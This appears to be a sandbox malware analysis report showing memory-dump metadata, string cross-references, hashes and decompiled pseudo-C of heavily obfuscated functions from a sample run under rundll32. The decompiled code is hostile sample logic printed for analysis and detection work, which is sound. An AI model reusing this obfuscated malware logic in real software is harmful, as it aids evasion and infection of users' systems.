$,, xrefs: 00432587
4RO', xrefs: 00432969
#t, xrefs: 004325D1
!x, xrefs: 00432AA6
f4, xrefs: 004328CB
@, xrefs: 00432AC6
Gawr, xrefs: 0043288B
Vy$2, xrefs: 00432CC8
Vy$2, xrefs: 00432D4E

Memory Dump Source

Source File: 00000007.00000002.2330983345.0000000000430000.00000040.00020000.sdmp, Offset: 00430000, based on PE: true

Associated: 00000007.00000002.2331018367.0000000000450000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2331022756.0000000000452000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_430000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: !x$#t$$,$4RO'$:S$Gawr$Vy$2$Vy$2$f4$s$u$2$@
API String ID: 0-1200869751
Opcode ID: 05f121b05e59188882c7d724ae5be8c04e345dd4b5ad1a52763b2e3f8c49c607
Instruction ID: e306aa99ea7b3574804e8c4602e7f99b9d32e7b91c8acad4a05e4584c99cf3d1
Opcode Fuzzy Hash: 05f121b05e59188882c7d724ae5be8c04e345dd4b5ad1a52763b2e3f8c49c607
Instruction Fuzzy Hash: 5F3214715083819FE378CF25C585B8BBBE2BBC8344F10891EE5D9962A0D7B98949CF47

Uniqueness

Uniqueness Score: -1.00%

Function 00171983, Relevance: 16.7, Strings: 13, Instructions: 442COMMON

Download Yara Rule

Strings

@, xrefs: 0017203A
Vy$2, xrefs: 0017223C
2, xrefs: 00171D80
4RO', xrefs: 00171EDD
s, xrefs: 00171A0D
:S, xrefs: 00171E9A
#t, xrefs: 00171B45
f4, xrefs: 00171E3F
!x, xrefs: 0017201A
u, xrefs: 001719D4
Gawr, xrefs: 00171DFF
$,, xrefs: 00171AFB
Vy$2, xrefs: 001722C2

Memory Dump Source

Source File: 00000007.00000002.2330819639.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_170000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: !x$#t$$,$4RO'$:S$Gawr$Vy$2$Vy$2$f4$s$u$2$@
API String ID: 0-1200869751
Opcode ID: 113ba5cbdea58830c0e016ea2be18b6fe50078e30343529e1375b1d1c372b620
Instruction ID: a1cce0c11ea9f62fac3e6c85535b4a63844a1463738725ea37fd1e994ab9f4a4
Opcode Fuzzy Hash: 113ba5cbdea58830c0e016ea2be18b6fe50078e30343529e1375b1d1c372b620
Instruction Fuzzy Hash: DB321471508381DFE368CF25C589A9BBBF2BBD4304F20891DE1D996261D7B5894ACF43

Uniqueness

Uniqueness Score: -1.00%

Function 0043CAA3, Relevance: 16.6, Strings: 13, Instructions: 375
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E0043CAA3(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v4;
				char _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				intOrPtr _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				unsigned int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				void* __ecx;
				intOrPtr _t372;
				void* _t379;
				signed int _t381;
				intOrPtr _t385;
				intOrPtr _t393;
				signed int _t395;
				signed int _t396;
				signed int _t397;
				signed int _t398;
				signed int _t399;
				signed int _t400;
				signed int _t401;
				void* _t402;
				void* _t428;
				intOrPtr* _t437;
				void* _t440;
				intOrPtr _t444;
				signed int* _t446;
				void* _t448;

				_push(_a12);
				_push(_a8);
				_v12 = __edx;
				_push(_a4);
				_push(__edx);
				E00442550(__edx);
				_v164 = 0xccf8;
				_t446 =  &(( &_v168)[5]);
				_t444 = 0;
				_t440 = 0x5b8b322;
				_t393 = 0;
				_t395 = 0x39;
				_v164 = _v164 * 0x47;
				_v164 = _v164 * 0x3b;
				_v164 = _v164 + 0xffffb5ce;
				_v164 = _v164 ^ 0x0d199a53;
				_v48 = 0x6ac5;
				_v48 = _v48 ^ 0x000067e6;
				_v120 = 0xab9;
				_v120 = _v120 + 0xffffc5bb;
				_v120 = _v120 >> 0xb;
				_v120 = _v120 * 0x34;
				_v120 = _v120 ^ 0x067fd26a;
				_v64 = 0x3f6b;
				_v64 = _v64 | 0x8301b69e;
				_v64 = _v64 ^ 0xf453b1d5;
				_v64 = _v64 ^ 0x7752766c;
				_v136 = 0x6672;
				_v136 = _v136 / _t395;
				_v136 = _v136 >> 2;
				_v136 = _v136 + 0x3c5d;
				_v136 = _v136 ^ 0x00000609;
				_v72 = 0x83af;
				_v72 = _v72 + 0xffff692b;
				_v72 = _v72 << 0xe;
				_v72 = _v72 ^ 0xfb36aaa0;
				_v144 = 0x1094;
				_v144 = _v144 << 3;
				_v144 = _v144 >> 1;
				_v144 = _v144 << 2;
				_v144 = _v144 ^ 0x000104fb;
				_v52 = 0xbbd9;
				_v52 = _v52 >> 0xa;
				_v52 = _v52 ^ 0x000007b3;
				_v56 = 0xb390;
				_v56 = _v56 | 0xd4330ee7;
				_v56 = _v56 ^ 0xd433f5ab;
				_v80 = 0x1d14;
				_v80 = _v80 ^ 0xe2529727;
				_v80 = _v80 << 0xb;
				_v80 = _v80 ^ 0x94518475;
				_v152 = 0x78c0;
				_v152 = _v152 + 0xffffa07a;
				_v152 = _v152 | 0x12864170;
				_v152 = _v152 + 0xffff96fb;
				_v152 = _v152 ^ 0x12858604;
				_v88 = 0x362c;
				_v88 = _v88 + 0x273d;
				_v88 = _v88 | 0x7b30ce6c;
				_v88 = _v88 ^ 0x7b308180;
				_v160 = 0x1107;
				_t396 = 0xd;
				_v160 = _v160 / _t396;
				_v160 = _v160 + 0xaf20;
				_v160 = _v160 << 0xe;
				_v160 = _v160 ^ 0x2c1bf631;
				_v28 = 0x16fd;
				_v28 = _v28 ^ 0xc6d3337a;
				_v28 = _v28 ^ 0xc6d3649c;
				_v128 = 0xb310;
				_v128 = _v128 + 0x60af;
				_t397 = 0x11;
				_v128 = _v128 * 0x17;
				_v128 = _v128 >> 0x10;
				_v128 = _v128 ^ 0x00003f03;
				_v108 = 0x969;
				_v108 = _v108 + 0x5b76;
				_v108 = _v108 | 0x469c96ef;
				_v108 = _v108 + 0xd995;
				_v108 = _v108 ^ 0x469dfd2d;
				_v24 = 0xa535;
				_v24 = _v24 << 9;
				_v24 = _v24 ^ 0x014a08df;
				_v116 = 0x2d09;
				_v116 = _v116 / _t397;
				_v116 = _v116 << 0xf;
				_t398 = 0x5a;
				_v116 = _v116 * 0x1d;
				_v116 = _v116 ^ 0x266728a5;
				_v156 = 0xc20b;
				_v156 = _v156 + 0xffff4ceb;
				_v156 = _v156 + 0x3710;
				_v156 = _v156 >> 6;
				_v156 = _v156 ^ 0x000023ae;
				_v60 = 0x9b8;
				_v60 = _v60 + 0xbf87;
				_v60 = _v60 ^ 0x000089a9;
				_v132 = 0x3af8;
				_v132 = _v132 / _t398;
				_v132 = _v132 ^ 0xca87d414;
				_v132 = _v132 + 0xffff6282;
				_v132 = _v132 ^ 0xca8759f3;
				_v92 = 0x2786;
				_v92 = _v92 + 0x26b3;
				_v92 = _v92 | 0x1d28531e;
				_v92 = _v92 ^ 0x1d28279a;
				_v140 = 0x492b;
				_v140 = _v140 + 0xffff62ea;
				_v140 = _v140 >> 0xe;
				_v140 = _v140 << 3;
				_v140 = _v140 ^ 0x001f936e;
				_v40 = 0x294b;
				_v40 = _v40 | 0x90a98536;
				_v40 = _v40 ^ 0x90a99c6f;
				_v124 = 0x1400;
				_v124 = _v124 << 0xf;
				_v124 = _v124 + 0xffffb6e1;
				_v124 = _v124 >> 0xa;
				_v124 = _v124 ^ 0x00026da1;
				_v148 = 0x1dcc;
				_v148 = _v148 + 0xffff7172;
				_v148 = _v148 ^ 0x59a54da9;
				_t399 = 0x3a;
				_v148 = _v148 / _t399;
				_v148 = _v148 ^ 0x02de527e;
				_v96 = 0xc2c0;
				_t400 = 0x59;
				_v96 = _v96 / _t400;
				_v96 = _v96 | 0x601f9634;
				_v96 = _v96 ^ 0x601fa5fc;
				_v68 = 0x5993;
				_v68 = _v68 + 0x3c37;
				_t401 = 0x27;
				_v68 = _v68 * 0x42;
				_v68 = _v68 ^ 0x00269f78;
				_v100 = 0x35d8;
				_v100 = _v100 + 0xf370;
				_v100 = _v100 + 0x85ef;
				_v100 = _v100 ^ 0x0001fecf;
				_v36 = 0x96a8;
				_v36 = _v36 << 4;
				_v36 = _v36 ^ 0x00096afa;
				_v84 = 0x6657;
				_v84 = _v84 / _t401;
				_v84 = _v84 + 0x88b2;
				_v84 = _v84 ^ 0x0000efd0;
				_v44 = 0x5846;
				_v44 = _v44 ^ 0xc187cff1;
				_v44 = _v44 ^ 0xc187ccd9;
				_v112 = 0x4c1b;
				_v112 = _v112 + 0xffffc101;
				_v112 = _v112 ^ 0x97fe48a5;
				_v112 = _v112 + 0xffff20cb;
				_v112 = _v112 ^ 0x97fd2571;
				_v32 = 0x3b02;
				_v32 = _v32 >> 3;
				_v32 = _v32 ^ 0x00000761;
				_v168 = 0x7902;
				_v168 = _v168 >> 0x10;
				_v168 = _v168 >> 9;
				_v168 = _v168 ^ 0x00000001;
				_v76 = 0x42c9;
				_v76 = _v76 >> 0xc;
				_v76 = _v76 ^ 0xe5acdda9;
				_v76 = _v76 ^ 0xe5acddac;
				_t437 = _v16;
				while(1) {
					L1:
					_t372 = _v104;
					while(1) {
						L2:
						_t428 = 0x137be7af;
						while(1) {
							L3:
							_t402 = 0x1f61ce4d;
							while(1) {
								L4:
								_t448 = _t440 - _t402;
								if(_t448 > 0) {
									goto L19;
								}
								L5:
								if(_t448 == 0) {
									E0043E48F(_v96, _v168, _v12, _v68, _v100, _t444);
									_t446 =  &(_t446[4]);
									L18:
									_t440 = 0x1e16564f;
									while(1) {
										L1:
										_t372 = _v104;
										goto L2;
									}
								} else {
									if(_t440 == 0x5b8b322) {
										_t440 = 0x1e3d7d53;
										continue;
									} else {
										if(_t440 == 0x6fb8319) {
											_t385 = E00440321(_a4, _v76, _v108, _v24,  *_t437);
											_t446 =  &(_t446[3]);
											_v20 = _t385;
											_t372 = _v104;
											_t428 = 0x137be7af;
											_t440 =  !=  ? 0x137be7af : 0x2332be2e;
											goto L3;
										} else {
											if(_t440 == _t428) {
												E004407A6(_t444, _v116, _v20,  &_v8, _v32, _t402, _v156, _v60, _v132, _v92);
												_t440 =  !=  ? 0x1f61ce4d : 0x2332be2e;
												_t372 = E00435AB8(_v140, _v40, _v124, _v148, _v20);
												_t446 =  &(_t446[0xb]);
												_t402 = 0x1f61ce4d;
												_t428 = 0x137be7af;
												goto L31;
											} else {
												if(_t440 == 0x1e16564f) {
													E0043DE81(_v36, _t444, _v84);
													_t440 = 0x35ec3230;
													while(1) {
														L1:
														_t372 = _v104;
														goto L2;
													}
												} else {
													if(_t440 != 0x1e3d7d53) {
														L31:
														if(_t440 != 0x2c302295) {
															_t372 = _v104;
															continue;
														}
													} else {
														_push(_t402);
														_t372 = E004354FB(0x20000);
														_t393 = _t372;
														if(_t393 != 0) {
															_t440 = 0x26c6e589;
															while(1) {
																L1:
																_t372 = _v104;
																L2:
																_t428 = 0x137be7af;
																L3:
																_t402 = 0x1f61ce4d;
																while(1) {
																	L4:
																	_t448 = _t440 - _t402;
																	if(_t448 > 0) {
																		goto L19;
																	}
																	goto L5;
																}
																goto L19;
															}
														}
													}
												}
											}
										}
									}
								}
								L24:
								return _t372;
								L33:
								L19:
								if(_t440 == 0x2332be2e) {
									_t437 = _t437 + 0x2c;
									if(_t437 >= _t372) {
										_t440 = 0x1e16564f;
										goto L31;
									} else {
										_t440 = 0x6fb8319;
										continue;
									}
								} else {
									if(_t440 == 0x26c6e589) {
										_push(_t402);
										_t444 = E004354FB(0x2000);
										_t440 =  !=  ? 0x2b10f021 : 0x35ec3230;
										goto L1;
									} else {
										_t372 = 0x2b10f021;
										if(_t440 == 0x2b10f021) {
											_t379 = E0043EBC8(_t402, _t428, _v136, _t402, _v72, _t402, _t402,  &_v4, _v144, _t402, _v52, _t393, _v56, _v80, _v152,  &_v16, _v88, _v160, _v28, _a4);
											_t446 =  &(_t446[0x12]);
											if(_t379 == 0) {
												goto L18;
											} else {
												_t381 = E0043A156();
												_t440 = 0x6fb8319;
												_t372 = _v16 * 0x2c + _t393;
												_v104 = _t372;
												_t437 =  >=  ? _t393 : (_t381 & 0x0000001f) * 0x2c + _t393;
												goto L2;
											}
											goto L33;
										} else {
											if(_t440 == 0x35ec3230) {
												return E0043DE81(_v44, _t393, _v112);
											}
											goto L31;
										}
									}
								}
								goto L24;
							}
						}
					}
				}
			}

0x0043caad
0x0043cab6
0x0043cabd
0x0043cac4
0x0043cacb
0x0043cacd
0x0043cad2
0x0043cada
0x0043cae4
0x0043cae6
0x0043caeb
0x0043caef
0x0043caf0
0x0043cafb
0x0043caff
0x0043cb07
0x0043cb0f
0x0043cb28
0x0043cb33
0x0043cb3b
0x0043cb43
0x0043cb4d
0x0043cb51
0x0043cb59
0x0043cb61
0x0043cb69
0x0043cb71
0x0043cb79
0x0043cb89
0x0043cb8d
0x0043cb92
0x0043cb9a
0x0043cba2
0x0043cbaa
0x0043cbb2
0x0043cbb7
0x0043cbbf
0x0043cbc7
0x0043cbcc
0x0043cbd0
0x0043cbd5
0x0043cbdd
0x0043cbe8
0x0043cbf0
0x0043cbfb
0x0043cc06
0x0043cc11
0x0043cc1c
0x0043cc24
0x0043cc2c
0x0043cc31
0x0043cc39
0x0043cc41
0x0043cc49
0x0043cc51
0x0043cc59
0x0043cc61
0x0043cc69
0x0043cc71
0x0043cc79
0x0043cc81
0x0043cc8d
0x0043cc90
0x0043cc96
0x0043cc9e
0x0043cca3
0x0043ccab
0x0043ccb6
0x0043ccc1
0x0043cccc
0x0043ccd4
0x0043cce3
0x0043cce6
0x0043ccea
0x0043ccef
0x0043ccf7
0x0043ccff
0x0043cd07
0x0043cd0f
0x0043cd17
0x0043cd1f
0x0043cd2a
0x0043cd32
0x0043cd3d
0x0043cd4d
0x0043cd51
0x0043cd5b
0x0043cd5e
0x0043cd62
0x0043cd6a
0x0043cd72
0x0043cd7a
0x0043cd82
0x0043cd87
0x0043cd8f
0x0043cd9a
0x0043cda5
0x0043cdb0
0x0043cdc0
0x0043cdc4
0x0043cdcc
0x0043cdd4
0x0043cddc
0x0043cde4
0x0043cdec
0x0043cdf4
0x0043cdfc
0x0043ce04
0x0043ce0c
0x0043ce11
0x0043ce16
0x0043ce1e
0x0043ce29
0x0043ce34
0x0043ce3f
0x0043ce47
0x0043ce4c
0x0043ce54
0x0043ce59
0x0043ce61
0x0043ce69
0x0043ce71
0x0043ce7d
0x0043ce82
0x0043ce86
0x0043ce90
0x0043ce9c
0x0043cea1
0x0043cea7
0x0043ceaf
0x0043ceb7
0x0043cebf
0x0043cecc
0x0043cecd
0x0043ced1
0x0043ced9
0x0043cee1
0x0043cee9
0x0043cef1
0x0043cef9
0x0043cf04
0x0043cf0c
0x0043cf17
0x0043cf25
0x0043cf29
0x0043cf31
0x0043cf39
0x0043cf44
0x0043cf4f
0x0043cf5a
0x0043cf62
0x0043cf6a
0x0043cf72
0x0043cf7a
0x0043cf82
0x0043cf8d
0x0043cf95
0x0043cfa0
0x0043cfa8
0x0043cfad
0x0043cfba
0x0043cfbf
0x0043cfc7
0x0043cfcc
0x0043cfd4
0x0043cfdc
0x0043cfe3
0x0043cfe3
0x0043cfe3
0x0043cfe7
0x0043cfe7
0x0043cfe7
0x0043cfec
0x0043cfec
0x0043cfec
0x0043cff1
0x0043cff1
0x0043cff1
0x0043cff3
0x00000000
0x00000000
0x0043cff9
0x0043cff9
0x0043d14a
0x0043d14f
0x0043d152
0x0043d152
0x0043cfe3
0x0043cfe3
0x0043cfe3
0x00000000
0x0043cfe3
0x0043cfff
0x0043d005
0x0043d128
0x00000000
0x0043d00b
0x0043d011
0x0043d101
0x0043d106
0x0043d109
0x0043d117
0x0043d11b
0x0043d120
0x00000000
0x0043d017
0x0043d019
0x0043d0a4
0x0043d0cb
0x0043d0d2
0x0043d0d7
0x0043d0da
0x0043d0df
0x00000000
0x0043d01b
0x0043d021
0x0043d064
0x0043d06a
0x0043cfe3
0x0043cfe3
0x0043cfe3
0x00000000
0x0043cfe3
0x0043d023
0x0043d029
0x0043d278
0x0043d27e
0x0043d284
0x00000000
0x0043d284
0x0043d02f
0x0043d03f
0x0043d040
0x0043d045
0x0043d04a
0x0043d050
0x0043cfe3
0x0043cfe3
0x0043cfe3
0x0043cfe7
0x0043cfe7
0x0043cfec
0x0043cfec
0x0043cff1
0x0043cff1
0x0043cff1
0x0043cff3
0x00000000
0x00000000
0x00000000
0x0043cff3
0x00000000
0x0043cff1
0x0043cfe3
0x0043d04a
0x0043d029
0x0043d021
0x0043d019
0x0043d011
0x0043d005
0x0043d1a6
0x0043d1a6
0x00000000
0x0043d15c
0x0043d162
0x0043d262
0x0043d267
0x0043d273
0x00000000
0x0043d269
0x0043d269
0x00000000
0x0043d269
0x0043d168
0x0043d16e
0x0043d245
0x0043d24b
0x0043d25a
0x00000000
0x0043d174
0x0043d174
0x0043d17b
0x0043d1fa
0x0043d1ff
0x0043d204
0x00000000
0x0043d20a
0x0043d20e
0x0043d216
0x0043d228
0x0043d22c
0x0043d230
0x00000000
0x0043d230
0x00000000
0x0043d17d
0x0043d183
0x00000000
0x0043d19b
0x00000000
0x0043d183
0x0043d17b
0x0043d16e
0x00000000
0x0043d162
0x0043cff1
0x0043cfec
0x0043cfe7

Strings

-, xrefs: 0043CD3D
FX, xrefs: 0043CF39
lvRw, xrefs: 0043CB71
K), xrefs: 0043CE1E
025, xrefs: 0043D17D
+I, xrefs: 0043CDFC
]<, xrefs: 0043CB92
025, xrefs: 0043D06A
v[, xrefs: 0043CCFF
025, xrefs: 0043D24D
7<, xrefs: 0043CEBF
RESCDIR, xrefs: 0043D036
Wf, xrefs: 0043CF17

Memory Dump Source

Source File: 00000007.00000002.2330983345.0000000000430000.00000040.00020000.sdmp, Offset: 00430000, based on PE: true

Associated: 00000007.00000002.2331018367.0000000000450000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2331022756.0000000000452000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_430000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: -$+I$025$025$025$7<$FX$K)$RESCDIR$Wf$]<$lvRw$v[
API String ID: 0-3541609021
Opcode ID: c0770792cf82ae2b9e4ac636a34dcb648dc708d056a1601b2e7f761c4e2546bd
Instruction ID: d4169389d28ba458cbdbd245cc909a2414999de3500e67774794d680d668d494
Opcode Fuzzy Hash: c0770792cf82ae2b9e4ac636a34dcb648dc708d056a1601b2e7f761c4e2546bd
Instruction Fuzzy Hash: A01245725083809FE368CF25C989A4BFBE1BBC8758F10991DF1D996260C7B98949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 0017C017, Relevance: 16.6, Strings: 13, Instructions: 375COMMON

Download Yara Rule

Strings

Wf, xrefs: 0017C48B
lvRw, xrefs: 0017C0E5
FX, xrefs: 0017C4AD
K), xrefs: 0017C392
025, xrefs: 0017C7C1
]<, xrefs: 0017C106
+I, xrefs: 0017C370
v[, xrefs: 0017C273
RESCDIR, xrefs: 0017C5AA
025, xrefs: 0017C5DE
025, xrefs: 0017C6F1
7<, xrefs: 0017C433
-, xrefs: 0017C2B1

Memory Dump Source

Source File: 00000007.00000002.2330819639.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_170000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: -$+I$025$025$025$7<$FX$K)$RESCDIR$Wf$]<$lvRw$v[
API String ID: 0-3541609021
Opcode ID: 4fd5ab3d9a626b7ad5c676ebc6d3fe79e98380c16587f6164649b078393db6c6
Instruction ID: 6a3c3225644f42b55cc30c45fee714bac9a1e0b67adf1d70cf0bcd097760a5b9
Opcode Fuzzy Hash: 4fd5ab3d9a626b7ad5c676ebc6d3fe79e98380c16587f6164649b078393db6c6
Instruction Fuzzy Hash: 611222725083819FE368CF25C98AA4BBBF2BBC4758F10891DF5D996260D7B58948CF43

Uniqueness

Uniqueness Score: -1.00%

Function 0044BBF1, Relevance: 16.5, Strings: 13, Instructions: 269
COMMONCrypto

Download Yara Rule

C-Code - Quality: 78%

			E0044BBF1(intOrPtr __ecx, void* __edx) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				unsigned int _v36;
				unsigned int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				intOrPtr* _t270;
				void* _t271;
				intOrPtr* _t272;
				intOrPtr* _t275;
				intOrPtr _t276;
				intOrPtr _t278;
				signed int _t280;
				signed int _t281;
				signed int _t282;
				signed int _t283;
				signed int _t284;
				signed int _t285;
				signed int _t286;
				signed int _t287;
				signed int _t288;
				void* _t289;
				void* _t318;
				intOrPtr* _t326;
				void* _t327;
				void* _t330;
				signed int* _t331;

				_t331 =  &_v96;
				_v36 = 0x7971;
				_v36 = _v36 >> 4;
				_v36 = _v36 >> 3;
				_v36 = _v36 ^ 0x0000182f;
				_v40 = 0xfd3e;
				_v40 = _v40 ^ 0x584e228f;
				_v40 = _v40 >> 0xf;
				_v40 = _v40 ^ 0x0000cb4e;
				_v60 = 0xc7d1;
				_v60 = _v60 * 0x1a;
				_t330 = __edx;
				_v60 = _v60 ^ 0xe7356e21;
				_v60 = _v60 ^ 0xe721078e;
				_t278 = __ecx;
				_v12 = 0x8b7c;
				_t326 = 0;
				_t327 = 0xc32a3cb;
				_t280 = 0x76;
				_v12 = _v12 / _t280;
				_v12 = _v12 ^ 0x0000029d;
				_v64 = 0x73a3;
				_v64 = _v64 | 0x4efcdde2;
				_v64 = _v64 ^ 0xed66e3eb;
				_v64 = _v64 ^ 0xa39a41bb;
				_v16 = 0x4227;
				_t281 = 0x6d;
				_v16 = _v16 / _t281;
				_v16 = _v16 ^ 0x00001ea2;
				_v72 = 0x8c44;
				_v72 = _v72 << 1;
				_v72 = _v72 >> 9;
				_v72 = _v72 + 0xffffe8d2;
				_v72 = _v72 ^ 0xffffd00c;
				_v52 = 0xbd45;
				_v52 = _v52 | 0x9852b62d;
				_v52 = _v52 ^ 0xe9b55024;
				_v52 = _v52 ^ 0x71e7e0db;
				_v56 = 0x6ad6;
				_v56 = _v56 | 0xcbfebfcb;
				_t282 = 0x29;
				_v56 = _v56 / _t282;
				_v56 = _v56 ^ 0x04f9ee03;
				_v76 = 0x6ec;
				_v76 = _v76 + 0xffffce11;
				_v76 = _v76 + 0xffff084a;
				_v76 = _v76 + 0xffff2b6a;
				_v76 = _v76 ^ 0xfffe3623;
				_v44 = 0x29d6;
				_v44 = _v44 << 1;
				_t283 = 0x5a;
				_v44 = _v44 / _t283;
				_v44 = _v44 ^ 0x00000afa;
				_v48 = 0xe792;
				_v48 = _v48 + 0x94ab;
				_t284 = 0x2e;
				_v48 = _v48 / _t284;
				_v48 = _v48 ^ 0x000072c7;
				_v4 = 0xd512;
				_v4 = _v4 + 0xffff3306;
				_v4 = _v4 ^ 0x00006e5d;
				_v8 = 0x264b;
				_v8 = _v8 + 0xffff8ff4;
				_v8 = _v8 ^ 0xffff8e36;
				_v80 = 0x7210;
				_v80 = _v80 ^ 0x6afff0fe;
				_t285 = 0x11;
				_v80 = _v80 / _t285;
				_v80 = _v80 << 6;
				_v80 = _v80 ^ 0x92d08612;
				_v84 = 0x33aa;
				_v84 = _v84 ^ 0x3f3ff109;
				_v84 = _v84 + 0xffff35d7;
				_t286 = 0x2f;
				_v84 = _v84 / _t286;
				_v84 = _v84 ^ 0x015805a3;
				_v88 = 0x96ab;
				_t287 = 0x47;
				_v88 = _v88 * 0x24;
				_v88 = _v88 * 0x4e;
				_v88 = _v88 << 7;
				_v88 = _v88 ^ 0x3a51b47d;
				_v92 = 0x8813;
				_v92 = _v92 | 0x160d8541;
				_v92 = _v92 + 0xffff816c;
				_v92 = _v92 * 0xf;
				_v92 = _v92 ^ 0x4ac3c30b;
				_v68 = 0x7d5a;
				_v68 = _v68 + 0xa00e;
				_v68 = _v68 ^ 0xd0cc0e09;
				_v68 = _v68 ^ 0xd0cd7390;
				_v20 = 0x6856;
				_v20 = _v20 | 0xcedc98a4;
				_v20 = _v20 ^ 0xcedcfbdf;
				_v24 = 0xae99;
				_v24 = _v24 >> 8;
				_v24 = _v24 ^ 0x0000275a;
				_v96 = 0xb43a;
				_v96 = _v96 * 0x19;
				_v96 = _v96 / _t287;
				_t288 = 3;
				_v96 = _v96 * 0x17;
				_v96 = _v96 ^ 0x0005aff4;
				_v28 = 0x55f9;
				_v28 = _v28 >> 1;
				_v28 = _v28 + 0x6ee3;
				_v28 = _v28 ^ 0x0000aff9;
				_v32 = 0x362c;
				_v32 = _v32 / _t288;
				_v32 = _v32 << 5;
				_v32 = _v32 ^ 0x00022d08;
				while(1) {
					L1:
					while(1) {
						L2:
						_t289 = 0x23245655;
						do {
							L3:
							while(_t327 != 0xc32a3cb) {
								if(_t327 == 0xd077af0) {
									return E0043DE81(_v28, _t326, _v32);
								}
								if(_t327 == 0xf6ecb09) {
									_t270 = E00433B5C( *((intOrPtr*)(_t326 + 8)), _v4, _v8);
									_t331 =  &(_t331[1]);
									 *((intOrPtr*)(_t326 + 0x18)) = _t270;
									__eflags = _t270;
									_t289 = 0x23245655;
									_t271 = 0x24e45cbd;
									_t327 =  !=  ? 0x23245655 : 0x31f83ea5;
									continue;
								}
								if(_t327 == 0x20f8708a) {
									_push(_t289);
									_t272 = E00435B7D(_v60, _t330, __eflags, _v12, _v64, _v16);
									_t331 =  &(_t331[4]);
									 *((intOrPtr*)(_t326 + 8)) = _t272;
									__eflags = _t272;
									if(__eflags == 0) {
										L11:
										_t327 = 0xd077af0;
										while(1) {
											L1:
											L2:
											_t289 = 0x23245655;
											goto L3;
										}
									}
									E00435696(_v72,  *((intOrPtr*)(_t326 + 8)), _v52, _v56,  *((intOrPtr*)(_t326 + 8)), _v76);
									_push(_v48);
									E00441A48( *((intOrPtr*)(_t326 + 8)));
									_t331 =  &(_t331[5]);
									_t327 = 0xf6ecb09;
									while(1) {
										L1:
										goto L2;
									}
								}
								if(_t327 == _t289) {
									_push(E0043F369);
									_push(_v92);
									_push(_t289);
									_push(_v88);
									_push(_v84);
									_t275 = E0043903E(_t326, _v80);
									_t331 = _t331 - 0xc + 0x20;
									 *((intOrPtr*)(_t326 + 0x28)) = _t275;
									__eflags = _t275;
									_t271 = 0x24e45cbd;
									_t327 =  !=  ? 0x24e45cbd : 0x31f83ea5;
									goto L2;
								}
								if(_t327 == _t271) {
									 *((intOrPtr*)(_t326 + 0x44)) = _t278;
									_t276 =  *0x451084;
									 *_t326 = _t276;
									 *0x451084 = _t326;
									return _t276;
								}
								if(_t327 != 0x31f83ea5) {
									goto L19;
								}
								E0044A8BF(_v68, _v20, _v24, _v96,  *((intOrPtr*)(_t326 + 8)));
								_t331 =  &(_t331[3]);
								goto L11;
							}
							_push(_t289);
							_t318 = 0x50;
							_t326 = E004354FB(_t318);
							__eflags = _t326;
							if(__eflags == 0) {
								_t327 = 0xddc842e;
								_t289 = 0x23245655;
								goto L19;
							}
							_t327 = 0x20f8708a;
							goto L1;
							L19:
							__eflags = _t327 - 0xddc842e;
						} while (__eflags != 0);
						return _t271;
					}
				}
			}

0x0044bbf1
0x0044bbf4
0x0044bbfc
0x0044bc01
0x0044bc06
0x0044bc0e
0x0044bc16
0x0044bc1e
0x0044bc23
0x0044bc2b
0x0044bc3c
0x0044bc40
0x0044bc42
0x0044bc4c
0x0044bc54
0x0044bc56
0x0044bc5e
0x0044bc64
0x0044bc6b
0x0044bc70
0x0044bc76
0x0044bc7e
0x0044bc86
0x0044bc8e
0x0044bc96
0x0044bc9e
0x0044bcaa
0x0044bcaf
0x0044bcb5
0x0044bcbd
0x0044bcc5
0x0044bcc9
0x0044bcce
0x0044bcd6
0x0044bcde
0x0044bce6
0x0044bcee
0x0044bcf6
0x0044bcfe
0x0044bd06
0x0044bd12
0x0044bd17
0x0044bd1d
0x0044bd25
0x0044bd2d
0x0044bd35
0x0044bd3d
0x0044bd45
0x0044bd4d
0x0044bd55
0x0044bd5d
0x0044bd62
0x0044bd68
0x0044bd70
0x0044bd78
0x0044bd84
0x0044bd87
0x0044bd8b
0x0044bd95
0x0044bd9d
0x0044bda5
0x0044bdad
0x0044bdb5
0x0044bdbd
0x0044bdc5
0x0044bdcd
0x0044bddb
0x0044bde0
0x0044bde6
0x0044bdeb
0x0044bdf3
0x0044bdfb
0x0044be03
0x0044be0f
0x0044be14
0x0044be1a
0x0044be22
0x0044be2f
0x0044be32
0x0044be3b
0x0044be3f
0x0044be44
0x0044be4c
0x0044be54
0x0044be5c
0x0044be69
0x0044be6d
0x0044be75
0x0044be7d
0x0044be85
0x0044be8d
0x0044be95
0x0044be9d
0x0044bea5
0x0044bead
0x0044beb5
0x0044beba
